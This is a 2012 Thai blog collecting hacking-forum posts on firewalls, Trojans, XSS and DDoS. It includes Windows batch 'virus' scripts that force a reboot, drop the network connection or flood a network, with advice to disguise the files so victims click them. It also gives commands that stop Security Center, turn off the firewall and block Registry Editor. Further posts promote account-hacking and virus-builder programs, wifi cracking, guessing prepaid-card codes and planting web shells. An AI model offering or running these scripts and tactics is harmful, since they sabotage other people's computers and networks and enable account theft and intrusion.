วันพฤหัสบดีที่ 12 เมษายน พ.ศ. 2555

ความรู้เกี่ยวกับFirewall

ลองค้นแล้วหาไม่เจอคิดว่าถ้าใคเข้ามาในเวบนี้ควรต้องรู้ไว้

ความรู้พื้นฐานเกี่ยวกับ Firewall
Firewall คืออะไร

Firewall นั้นหากจะแปลตรงตัวจะแปลว่ากำแพงไฟ แต่ที่จริงแล้ว firewall นั้นเป็นกำแพงที่มีไว้เพื่อป้องกันไฟโดยที่ตัวมันเองนั้นไม่ใช่ไฟตามดังคำ แปล firewall ในสิ่งปลูกสร้างต่างๆนั้นจะทำด้วยอิฐเพื่อแยกส่วนต่างๆของสิ่งปลูกสร้างออก จากกันเพื
่อที่ว่าในเวลาไฟไหม้ไฟจะได้ไม่ลามไปทั่วสิ่งปลูกสร้างนั้นๆ หรือ Firewall ในรถยนต์ก็จะเป็นแผ่นโลหะใช้แยกส่วนของเครื่องยนต์และส่วนของที่นั่งของผู้ โดยสารออก
จากกัน
ในเครือข่าย Internet นั้น firewall อาจถูกใช้สำหรับป้องกันไม่ให้ "ไฟ" จากเครือข่าย Internet ภายนอกลามเข้ามาภายในเครือข่าย LAN ส่วนตัวของท่านได้ หรืออาจถูกใช้เพื่อป้องกันไม่ให้ผู้ใช้ใน LAN ของท่านออกไปโดน "ไฟ" ในเครือข่าย Internet ภายนอกได้
ตามคำจำกัดความแล้ว firewall หมายความถึง ระบบหนึ่งหรือกลุ่มของระบบที่บังคับใช้นโยบายการควบคุมการเข้าถึงของระหว่างเครือข่า
ยสอง เครือข่าย โดยที่วิธีการกระทำนั้นก็จะแตกต่างกันไปแล้วแต่ระบบ แต่โดยหลักการแล้วเราสามารถมอง firewall ได้ว่าประกอบด้วยกลไกสองส่วนโดยส่วนแรกมีหน้าที่ในการกั้น traffic และส่วนที่สองมีหน้าที่ในการปล่อย traffic ให้ผ่านไปได้

แนะนำเกมส์ฝึก Hack ที่มีความสมจริงที่สุดครับ [ชาว Ruk-Com ไม่ควรพลาด]

Hack Me If You Can ?

สวัสดีครับวันนี้จะมาแนะนำเว็บเกี่ยวกับสอน ทักษะการเป็น Hacker อย่างดีเลยครับ (game) นะครับ

เว็บ
http://www.hackerskill.net << ชื่อเว็บก็น่าตื่นเต้นแล้ว

ในเว็บมีอะไรบ้าง เดี๋ยวจะพาไปชมครับ

ขั้นตอนการเล่นเกมส์

1 สมัครสมาชิกก่อนเลยครับ

เสร็จแล้ว มองหาตามภาพครับ

ด่านต่างๆ มีทั้ง basic และั ภารกิจเสมือนจริงครับ



สำหรับผู้ที่เพิ่งจะเริ่มต้นไม่มีความรู้มากนักทางเว็บได้จัดทำที่ไว้ให้แชร์ความรู้กัน สอบถาม กันได้ตามสบายครับ

ข้อมูลจาก ruk-com.in.th

แจก โค้ดไวรัส Autorun งายๆแต่โครตอันตราย

ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น

Code:   
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0 

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต

Code:   
@echo off
TITLE Mr_Unlocker
ipconfig /release 

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:   
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH 

วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสข้าพเจ้าล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***

==============================

*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว

วันอังคารที่ 10 เมษายน พ.ศ. 2555

ที่สุดของ Hacker ที่ Hacker ไฝ่ฝันไขว้ขว้ามันมา

เรื่องนี้อาจเป็นเรื่องสุดท้ายของผม  ก่อนไปผมอยากเห็น พวกคุณ ขอบคุณ ผมจริงๆจังๆสักที ขอคุณครับ :-\ :-\

- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง  DWORD  Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default)   Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
@echo off
net stop "Security Center"
netsh firewall set opmaode mode=disable
4.รุ้ข้อมูลเครื่องเหยื่อ
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus

- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย

- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com

ข้อมูลจาก ruk-com.in.th

เจาะระบบ Net work ฉบับสมบูรณ์ (หากซ้ำขออภัย)

 ;D ;D ;D
อันนี้พี่ผมโหลดมาให้ครับ

part1.rar

part2.rar

part3.rar

_________________
Pass สำหรับดาวน์โหลดสำรอง : http://www.weblampang.com/progame

 ;D ;D ;D

Edit By Admin

ข้อมูลจาก ruk-com.in.th

ถ้าคุณอยากจะ Hack เว็บซักเว็บนึง



การ hack แบบเนี้ยรู้สึกว่าเค้าจะเรียกกันว่า hack webapp ซึ่งง่ายและเข้าใจได้ไว สำหรับผู้เริ่มต้น hack แบบนี้ เราจะได้มาซึ่ง shell ไอ้เจ้า shell นี้ ถ้าให้อธิบายคนไม่รู้เรื่องเอาเลยได้ฟัง คงจะเปรียบกับเรา บุกเข้าไปถึง drive ต่างๆ ของเครื่อง server เช่น c: d: e: แล้วเราสามารถที่จะ สั่ง ให้เครื่องนั้น ทำอะไรก็ได้ ด้วย shell command ต่างๆ เช่น จะ dir ดู file จะ format จะขโมยสคริป จะ dump database จะ ฯลฯ ตามแต่จินตนาการ เท่าที่ command ต่างๆ จะทำได้

เริ่มเข้าเรื่องดีกว่า

ขั้นแรก ขั้นหา ip
ก่อนจะ hack เราก็ต้องหาว่าเครื่องเจ้ากรรมเนี้ย ตั้งอยู่ที่ไหน  การที่เราจะดูว่าเวปนี้ตั้งอยู่ในคอมเครื่องไหน ใช้คอมเครื่องไหนเป็น server หรือไปเช่า host ใครอยู่  ไม่ว่าจะใครจะเรียกยังไง ผมเรียกว่าเครื่องนั้นคือเครื่อง server แล้วกัน  สิ่งที่จะบ่งชี้ว่าเครื่องใครเป็นเครื่องใครก็คือ IP  ทีนี้การจะได้มาซึ่ง IP ของเจ้าคอมเครื่องที่มีเวปที่เราอยากจะ hack ตั้งอยู่  ก็มีหลายวิธี แบบง่ายเราก็ เข้าหน้า จอ dos แล้วก็ ping ชื่อเวป เราก็จะได้ ip แระ  หรือ เราจะใช้ addons ของ firefox ก็ได้ (ลองหาเอง มีเยอะแยะ)  หรือจะเข้า google หาเวปประเภทบริการ whois ให้ก็ได้

เราสามารถ hack บัตรเติมเงินโทรศัพท์ ได้หรือไม่

บังเอิญได้อ่านบทความนี้มาจาก Net พบว่า เป็นโจทย์ที่น่าคิดมาก เพราะผมก็ใช้บัตรเติมเงินอยู่ เป็นของ dtac
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร

   เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ

          แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป

           สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก

วันอาทิตย์ที่ 8 เมษายน พ.ศ. 2555

อัจฉริยะ จบแค่ ป.4 Hack ระบบ ATM ธนาคาร โอนเงินเข้ามือถือ



แกะรอยรวบโจรไฮเทค จบแค่ ป.4 แต่ใช้อินเตอร์เน็ทบนมือถือเจาะระบบเอทีเอ็ม ยักเงินเติมยอดในซิมการ์ดมือถือ เจ้าของบัญชีงงตาแตกถูกตอดเงินเป็นระยะสูญเป็นแสน แถมผู้เสียหายมีอีกหลายราย ตร.ออกหาข่าวอยู่นาน กระทั่งพบคนร้ายนำซิมการ์ดหลายร้อยใบมาขายที่ ?ไนท์พลาซ่า? เปิดเกมส์แกะรอย พบพิรุธเงินไหลผ่านมือถือผิดสังเกต แถมเปิดโต๊ะเติมเงินมือถือที่บ้านเกิด-ลูกค้าเพียบ บุกค้นบ้านพบหลักฐานมัด เจ้าตัวรับทำมา 4 ปีแต่ไม่รวย ด้านผู้ประกอบการเตือนอย่าหลงเชื่อเติมเงินราคาถูก

       เมื่อวันที่ 9 ก.พ. พ.ต.อ.นริศ ละม้ายอินทร์ ผกก.สภ.อ.วิเศษชัยชาญ จ.อ่างทอง ได้รับการประสานขอกำลังจากพ.ต.ท.ธนะรัตน์ ชุมสวัสดิ์ รอง ผกก.สส.ศสส.ภ.5 เมื่อกลางดึกคืนวันที่ 8 ก.พ. เพื่อนำหมายศาลจังหวัดอ่างทองที่ 29/2549 เข้าตรวจค้นและจับกุมนายชัยยศ ฉัตรอมรวิเศษ อายุ 36 ปี อยู่บ้านเลขที่ 526 หมู่ 6 ต.ศาลเจ้าโรงทอง อ.วิเศษชัยชาญ ผู้ต้องหาก่อคดีลักทรัพย์โดยใช้โทรศัพท์มือถือเจาะรหัสข้อมูลโอนเงินจากตู้ เอทีเอ็มธนาคารเป็นค่าเติมเงินโทรศัพท์ เหตุเกิดที่ สภ.อ.แม่ปิง จ.เชียง ใหม่ และอีกหลายท้องที่ ตั้งแต่ปี 2545-2549 ต่อเนื่องกัน

        จากการตรวจค้นพบซิมการ์ดโทรศัพท์มือถือทุกระบบของบริษัท เอไอเอส ดีแทค ออเร้นจ์ ที่มีอยู่นับร้อยใบ สมุดบันทึกโทรศัพท์มือถือของลูกค้า รหัสผ่านตู้เอทีเอ็มของธนาคารต่าง ๆ หลายร้อยรหัส บัตรเติมเงินที่ใช้แล้ว ภาพโป๊ และเกมที่ดาวน์โหลดมาจากอินเทอร์เน็ตผ่านโทรศัพท์มือถือ ที่ไรต์ลงแผ่นซีดีเพื่อจำหน่าย ทั้งนี้ภายหลังการจับกุมเจ้าหน้าที่ศสส.ภ.5 ได้ลงบันทึกประจำวันเป็นหลักฐาน ก่อนควบคุมตัวไปสอบสวนและขยายผลที่ จ.เชียงใหม่ทันที

Hotmail,yahoo,gmail,Facebook,hi5,webonline[โปรแกรมมาแล้ว]





ขอมานะครับ วันนี้ไม่ทัน เด๋วพรุ่ง นี้เอาให้มี ให้เล่นอีกเย๊อะ

ขอความกรุณา อย่าเอา User กับ Pass ที่อยู่ในภาพไป แก้ไขหรือเปลี่ยน รหัสและอย่าทำให้เขาได้รับความเสียหายนะ ครับ
เราศึกษา เพื่อแก้ไข ไม่ใช่ทำลายนะครับ พรบ คอมพิวเตอร์ ปี 54  จะออกแล้ว แรงนะ ครับ


กดขอตรงนี้=> คลิก!! http://adf.ly/2ITjI

ชื่อบนภาพ เป็นนามแฟงผมเอง
พรุ่งนี้มี  2 ตัวมาแจก นะครับ รออ

1. โปรแกรม hack mail
2. โปรแกรมสร้างไวรัส สำเร็จรูป
อันนี้ลองได้ ไม่รับประกัน โดนมาแล้ว เล่าให้ฟังสักนิดก็ได้ ผมทำไว้เล่น ๆ ใส่ แฟรชไดร์ ไว้ บังเอิญ เพื่อน ยืมไปสอนหนังสือ นศ ลืมบอกว่าเป็นไวรัส ทำไว้ซะสวยงามเลยเป็น ไอคอนรูป เกมส์
คอม 45 เครื่อง ลง วินโดว์ใหม่หมด 555+


ข้อมูลจาก ruk-com.in.th

อยากรู้ไหมทำไม โนเกีย 1100 มือถือจอขาวดำจึงมีราคาพุ่งสูงถึงเครื่องละแสนบาท!



แต่เป็นจำเลยใหญ่ไปแล้วกับ “โนเกีย 1100″ มือ ถือจอขาวดำสุดคลาสสิก ฟีเจอร์สุดเบบี้ มีไฟฉายติดมาด้วย ถึงแม้จะตกรุ่นไปนานแล้ว แต่กำลังเป็นที่ต้องการอย่างมาก (อีกครั้ง) ในขณะนี้

อย่างไรก็ดี ด้วยความที่มันไม่มีลูกเล่นอะไรที่พิศดารเลยนี่เอง ประกอบกับราคาสุดถูงในบรรดามือถือแบรนด์โนเกียทั้งหมด จึงทำให้ “โนเกีย 1100″ มือถือที่เปิดตัวเมื่อ 6 ปีที่แล้วด้วยราคาหลัก 1000 บาทต้นๆ ในไทย กลายเป็นมือถือที่ขายไปทั่วโลก ขายไปแล้วกว่า 200 ล้านเครื่อง!!! และวันนี้มันก็มลายหายไปจากตลาดเป็นที่เรียบร้อย

แต่หารู้ไม่ว่า วันนี้ “โนเกีย 1100″ มีค่าหลักแสนบาท! ไม่ใช่เพราะผู้ออกแบบเสียชีวิตลง แต่เป็นเพราะมันคืออาวุธชิ้นสำคัญ ที่แฮคเกอร์จะคว้าเงินล้านลงกระเป๋าตัวเองได้ แต่สิ่งที่สำคัญมากๆ ก็คือ “โนเกีย 1100″ เครื่องนั้นจะต้องผลิตจากเมือง Bochum เยอรมัน เท่านั้น

อยากรู้ว่าทำไมจึงเป็นเช่นนั้น และพวกแฮคเกอร์จะใช้มือถือทรงแท่งหน้าตาเชยๆ นั้นทำอะไร เชิญกวาดตาไปบรรทัดต่อไปทันที!

วิธีการคือ เหล่าแฮคเกอร์จะนำมือถือรุ่นนี้ ผลิตจากที่เยอรมันนี่ มารันโปรแกรมลงไปใหม่ เพื่อให้มันสามารถใช้เบอร์เดียวกับมือถือเครื่องอื่นได้ นั่นก็หมายความว่า ข้อความ SMS ใดๆ ที่เบอร์มือถือต้นฉบับได้ มือถือโนเกีย 1100 เครื่องที่ก๊อปปี้มาก็จะได้รับเช่นเดียวกัน

สอนวิธีการ hack wireless ใช้แบบฟรีๆเลยครับ [หากซ้ำก้อขออภัย]

 ::) ::) ::)
สำหรับท่านที่บ้านหรือที่ไหนๆที่มีสัญญาณไวเลสแต่เขาล๊อกพาสเวิสไว้ลองมาดูวิธีนี้ดูครับท่านอาจจะได้ใช้เนตแบบฟรีๆไม่อั้นก็ได้ครับ

เป็นไฟล์เวิดนะครับดาวโหลดแล้วไปปริ้นอ่านกันได้เลยครับ

คู่มือ



โปรแกรม [4.0 mb]

 

หรือ



ถ้าไม่ได้ ก้อ Copy Link เอานะคร้าบ

ข้อมูลจาก ruk-com.in.th

วันเสาร์ที่ 7 เมษายน พ.ศ. 2555

ม้าโทรจัน(ของคอมพิวเตอร์)

ม้าโทรจัน (Trojan horse)

หมายถึง โปรแกรมคอมพิวเตอร์ที่ถูกบรรจุเข้าไปในคอมพิวเตอร์ เพื่อลอบเก็บข้อมูลของคอมพิวเตอร์เครื่องนั้น เช่น ข้อมูลชื่อผู้ใช้ รหัส

ผ่าน เลขที่บัญชีธนาคาร หมายเลขบัตรเครดิต และข้อมูลส่วนบุคคลอื่น ๆ โดยส่วนใหญ่แฮกเกอร์จะส่งโปรแกรมเข้าไปในคอมพิวเตอร์เพื่อดัก

จับ ข้อมูลดังกล่าว แล้วนำไปใช้ในการเจาะระบบ และเพื่อโจมตีคอมพิวเตอร์, เซิร์ฟเวอร์, หรือระบบเครือข่ายอีกที ซึ่งเป็นที่รู้จักกันในชื่อการ

โจมตีเพื่อ "ปฏิเสธการให้บริการ" (Denial of Services)โปรแกรมม้าโทรจัน ถือเป็นโปรแกรมที่สอดคล้องกับการทำงานของคอมพิวเตอร์

ไม่มีคำสั่งหรือการปฏิบัติการที่เป็นอันตรายต่อตัวคอมพิวเตอร์ จึงไม่ถือว่าเป็นไวรัสคอมพิวเตอร์

------------------------------------------------------------------------------------------

ม้าโทรจันในคอมพิวเตอร์ทํางานอย่างไร

อย่างที่กล่าวแล้วว่า ม้าโทรจันแตกต่างจากไวรัสที่การทํางาน ไวรัสทํางานโดย ทําลายคอมพิวเตอร์ ทั้งฮารดแวร์และซอฟตแวร์อย่างแท้จริง
ไวรัส บางตัวอย่าง Love BUG ทําลายไฟล์โดยการเปลี่ยนแปลงรายละเอียดในไฟล์ ไวรัส CIH ทําให้ไบออสของคอมพิวเตอร์เสีย และเข้าถึงข้อมูลในฮารดดิสกไม่ได้ แต่?ม้าโทรจัน? ไม่ทําอะไรกับคอมพิวเตอร์ ม้าโทรจันไม่มีคําสั่งหรือพฤติกรรมการทําลายคอมพิวเตอร์เหมือนไวรัส

ม้าโทรจันเหมือนโปรแกรมทั่วไปในคอมพิวเตอร์ สมัยก่อนเวลาพูดถึงม้าโทรจัน จะว่ากันว่าขนาดของไฟล์ แตกตางจากไวรัสที่ขนาดของม้าโทรจันนั้น เป็นโปรแกรมขนาดเล็ก และเป็นโปรแกรมที่ไม่ถือวามีพฤติกรรมเป็นอันตรายต่อคอมพิวเตอร์ ซึ่งในทางการกําจัดไวรัส จะมีการตรวจ

วันศุกร์ที่ 6 เมษายน พ.ศ. 2555

การโจมตี XSS ตอนที่ 1


การโจมตี XSS ตอนที่ 1

จากที่ทาง www.datasafehouse.net ซึ่งเป็นบริการเสริมสร้างความปลอดภัยให้กับเว็บไซต์ได้เปิดเผยสถิติเกี่ยว กับเว็บไซต์ในประเทศไทยที่มีความเสี่ยงต่อการโจมตีมีถึง 41 เว็บ (รายละเอียด) ส่วนใหญ่แล้วเป็นช่องโหว่เว็บที่เกิดจากเทคนิคที่เรียกว่า XSS
Cross-site scripting (XSS) คือช่องโหว่ในคอมพิวเตอร์ชนิดหนึ่งที่มักพบในเว็บแอพพลิเคชั่นซึ่งยอมให้
ผู้ใช้เว็บที่มีเจตนาร้ายสามารถส่งโค้ดคำสั่งเข้าไปในหน้าเว็บที่ผู้ใช้เว็บคนอื่น ๆ เปิดดู ตัวอย่างของโค้ดดังกล่าวได้แก่
โค้ด HTML และสคริปต์ฝั่งไคลเอ็นท์ ผู้โจมตีสามารถใช้ช่องโหว่ cross-site scripting เพื่อหลบหลีกมาตรการ
ควบคุมการเข้าถึง เช่น same origin policy เมื่อไม่นานมานี้ช่องโหว่ประเภทนี้ถูกใช้เพื่อสร้างการโจมตีฟิชชิ่งและช่อง
โหว่เบราว์เซอร์อันทรงพลัง แต่เดิม Cross-site script ใช้ตัวย่อว่า CSS อย่างไรก็ตามตัวย่อนี้ไม่เป็นที่นิยมอีกต่อไป

ความเป็นมาการโจมตี XSS

การตรวจสอบ Cross Site Scripting

    ไม่ว่าข้อมูลใดๆก็ตามที่ได้รับจาก User  ถือว่ามีความเสี่ยงในด้านของปลอดภัยทั้งนั้น เพราะเราไม่สามารถรู้วัตถประสงค์ที่แท้จริงของผู้ใช้งานระบบของเราว่าเค้าจะ ใส่ข้อมูลที่เราต้องการหรืออาจจะเป็นข้อมูลที่เราไม่พึ่งประสงค์เข้ามาใน ระบบ หนทางที่ดีที่สุดคือการใส่ระบบป้องกันให้ระบบของเรา หรือ การเขียน program ให้ปลอดภัยนั้นเอง

      การโจมตีสามารถทำได้โดย การเขียน script ฝั่งลงไปกับข้อมูล (Cross site scripting attacks) หรือการหาช่ิองทางของคำสั่ง query ในฐานข้อมูลเพื่อดึงข้อมูลที่ต้องการออกมา (SQL injection attacks) สามารถทำได้หลากหลายรูปแบบ และเป็นสิ่งที่เราน่าจะเรียนรู้เพื่อนำไปสู่วิธี่การป้องกันที่ดี  ลองคิดดูว่าการเขียนโปรแกรมของเรามีการจัดการเรื่องพวกนี้ได้ดีแค่ไหน หรือ ดีพอหรือยัง มาดูตัวอย่างการป้องกันที่เราคิดว่าน่าจะเพียงพอ

 ถ้าข้อมูลที่เราได้รับเป็นแบบนี้ 

 somepage.aspx?foo=<script>alert('vulnerable XSS code')</script>

 ฝั่ง Server เราก็เขียนก็แค่เขียน filter เพื่อป้องกันไม่ให้ script นี้สามารถ รันได้

20 เครื่องมือด้านความปลอดภัย

20 เครื่องมือด้านความปลอดภัย
เครื่องมือชุดเดียวกันนั้นอาจใช้ได้ทั้งในการโจมตี และป้องกันระบบ

ในวงการ Security มีเรื่องแปลกอย่างหนึ่ง ที่ยากจะหาได้ในสาขาอื่นๆ ของคอมพิวเตอร์ นั่นก็คือเรื่องของแฮ็กเกอร์และผู้ดูแลระบบความปลอดภัย ที่ต่างก็ใช้ความรู้เดียวกัน เครื่องมือชุดเดียวกัน ในวัตถุประสงค์ที่แตกต่างกันอย่างสิ้นเชิง ฝ่ายหนึ่งใช้ความรู้และเครื่องมือเพื่อโจมตี แต่อีกฝ่ายใช้ความรู้และเครื่องมือเพื่อป้องกัน อาจเรียกได้ว่าเป็น ?คนละด้านของดอลลาร์เดียวกัน? ในบทความนี้ผมจะแนะนำให้รู้จักกับเครื่องมือต่างๆ จำนวน 20 โปรแกรม บางโปรแกรมสามารถทำหน้าที่ได้ทั้งโจมตีและป้องกัน บางโปรแกรมก็เป็นโปรแกรมป้องกันเพียงอย่างเดียว

การจัดลำดับ 20 เครื่องมือนี้ ผมไม่ได้จัดเองหรอกครับ แต่เป็นการสำรวจของหน่วยงานที่ชื่อว่า InSecure.org ผู้สร้างโปรแกรม NMAP อันลือลั่น เป็นผู้จัดทำขึ้น โดยสอบถามจากผู้ที่มีอีเมล์อยู่ในลิสต์ (Mailing List) ของ InSecure.org ซึ่งถือว่าเป็นลิสต์ที่ครอบคลุมผู้ที่อยู่ในวงการ มากพอควร ดังนั้นการจัดอันดับนี้จึงสมควรเชื่อถือได้ ในชุดโปรแกรมนี้ มีหลายๆ โปรแกรมที่สามารถนำไปใช้งานด้านมืดได้ แต่ก็สามารถนำไปใช้ประโยชน์ได้เช่นกัน เพราะการป้องกันที่ดีอย่างหนึ่ง ก็คือการทดลองโจมตีตัวเอง ดังนั้นรู้จักเครื่องมือเหล่านี้ไว้ ก็คงไม่เสียหลาย ก็ขอเริ่มเลยก็แล้วกันนะครับ โดยลำดับนี้จะเรียงตามความนิยมมากไปหาน้อยตามลำดับ

1) Nessus

การจู่โจมระบบ (Denial of Service)

การโจมตีแบบ Distributed Denial of Service (DDoS)
มักจะนำเครื่องมือที่จะใช้ในการโจมตีไปติดตั้งบนเครื่องที่ถูกเจาะไว้แล้ว ซึ่งมีจำนวนพอสมควร จากนั้นจึงจะระดมส่งข้อมูลในรูปแบบที่ควบคุมได้โดยผู้ควบคุมการโจมตีไปยังเหยื่อหรือเป้าหมายที่ต้องการ ซึ่งการโจมตีรูปแบบนี้มักจะก่อให้เกิดการใช้แบนด์วิดธ์อย่างเต็มที่จนผู้อื่นไม่สามารถใช้งานได้ตามปกติ หรือทำให้ระบบที่ถูกโจมตีไม่มีทรัพยากรเหลือพอที่จะให้บริการผู้ใช้ธรรมดาได้
การป้องกันการโจมตีแบบ DoS นั้น จะสามารถทำได้ก็ต่อเมื่อทราบวิธีของการโจมตีก่อน และการป้องกันการโจมตีในบางครั้งก็ไม่สามารถทำได้ในครั้งเดียว ขึ้นอยู่กับรูปแบบการโจมตี สถาปัตยกรรมของเป้าหมายที่ถูกโจมตี ซึ่งการป้องกันอาจจะได้ผลหรือล้มเหลวก็ขึ้นอยู่กับปัจจัยเหล่านี้คือ
การมีคู่มือหรืเอกสารการใช้งานของระบบเป้าหมายที่ถูกโจมตี
การตรวจจับการโจมตีสามารถทำได้อย่างรวดเร็วและสามารถค้นหาต้นตอที่แท้จริงได้
มีวิธีดำเนินการสนองตอบเหตุการณ์ละเมิดความปลอดภัยอย่างเป็นขั้นตอน (incident response)
และการป้องกันรูปแบบอื่นที่สามารถทำได้
รูปแบบการโจมตีและการป้องกัน
เครื่องมือที่ใช้โจมตีแบบ DDoS มีใช้กันอย่างแพร่หลายมานานหลายปีแล้ว และบรรดาผู้ผลิตเองต่างก็มีวิธีป้องกันการโจมตีเช่นเดียวกัน รูปแบบการโจมตีที่นิยมใช้กันก็มีอย่าง SYN flood, UDP flood, ICMP flood, Smurf, Fraggle เป็นต้น ซึ่งจะได้ศึกษาในรายละเอียดและวิธีป้องกันกันต่อไป

ทำความรู้จักกับโปรแกรมตรวจสอบและค้นหาจุดที่ล่อแหลมต่อการถูกโจมตี

ทำความรู้จักกับโปรแกรมตรวจสอบและค้นหาจุดที่ล่อแหลมต่อการถูกโจมตี
ใน ปัจจุบันมีนวัตกรรมด้านการรักษาความปลอดภัยเกิดขึ้นอย่างมากมายตามกระแสของ ยุคโลกาภิวัฒน์ เพราะยิ่งเทคโนโลยีก้าวไกลไปเท่าไร ก็ดูเหมือนว่าโจรผู้ร้ายก็เพิ่มขึ้นเป็นเงาตามตัวอยู่อย่างนั้น และเมื่อในขณะนี้คอมพิวเตอร์เข้ามามีบทบาทในชีวิตประจำวันของเราๆ ท่านๆ อยู่ทุกขณะจิต แน่นอนว่าอาชญากรทางคอมพิวเตอร์ก็จ้องที่จะแสวงหาผลประโยชน์ จากความพลาดพลั้งหรือรู้เท่าไม่ถึงการณ์หรือแม้กระทั่งความโง่เขลาของผู้ใช้ คอมพิวเตอร์อยู่เสมอๆ
            หากคุณกำลังวางแผนที่จะทำธุรกิจอิเลกทรอนิกส์ (E-business) ความปลอดภัยในธุรกิจ ต้องมาเป็นอันดับ 1 แน่นอน แต่ในปัจจุบันการรักษาความปลอดภัยในเรื่องเงินๆ ทองๆ ถือเป็นเกมที่อันตรายมากสุดๆ เลยก็ว่าได้ ถ้าไม่เชื่อคุณลองพิจารณาตามข้อเท็จจริงที่ว่า จุดบกพร่องหรือจุดที่ล่อแหลมต่อการถูกโจมตีโดยแฮกเกอร์ในระบบถูกตรวจพบได้ นับร้อยในแต่ละปี สคริปต์แก้ไขข้อบกพร่อง (patch) ใหม่ๆ นับสิบมีให้อัปเดตทุกเดือน ระบบรักษาความปลอดภัยนับพันที่พร้อมจะล้าหลังได้ตลอดเวลา ด้วยเหตุผลเหล่านี้หากคุณต้องการที่จะติดต่อเพื่อตกลงด้านการเงินกับลูกค้า ระดับของระบบรักษาความปลอดภัยของคุณต้องเป็นระดับขั้นสุดยอด ประหนึ่งว่า ปิดทุกจุดอ่อนที่เคยมีการโจมตีในประวัติศาสตร์โลก มิหนำซ้ำ ระบบของคุณต้องทำงานอย่างไร้ข้อผิดพลาดปราศจากสิ่งที่ไม่พึงประสงค์โดยที่ คุณต้องซ่อมแซมทุกข้อบกพร่องในระบบในทุกๆ เวลาที่เปิดเครื่อง แต่ผู้ไม่ประสงค์ดีทั้งหลายต้องการเพียงแค่จุดอ่อนเพียงจุดเดียวท่านั้น เพื่อเข้าไปทำลายทุกๆ อย่างที่คุณมี !

วันพุธที่ 4 เมษายน พ.ศ. 2555

Hackเล่นเน็ตที่ไหนก็ได้ + วิธีใช้อย่างละเอียด

Hackเล่นเน็ตที่ไหนก็ได้  + วิธีใช้อย่างละเอียด

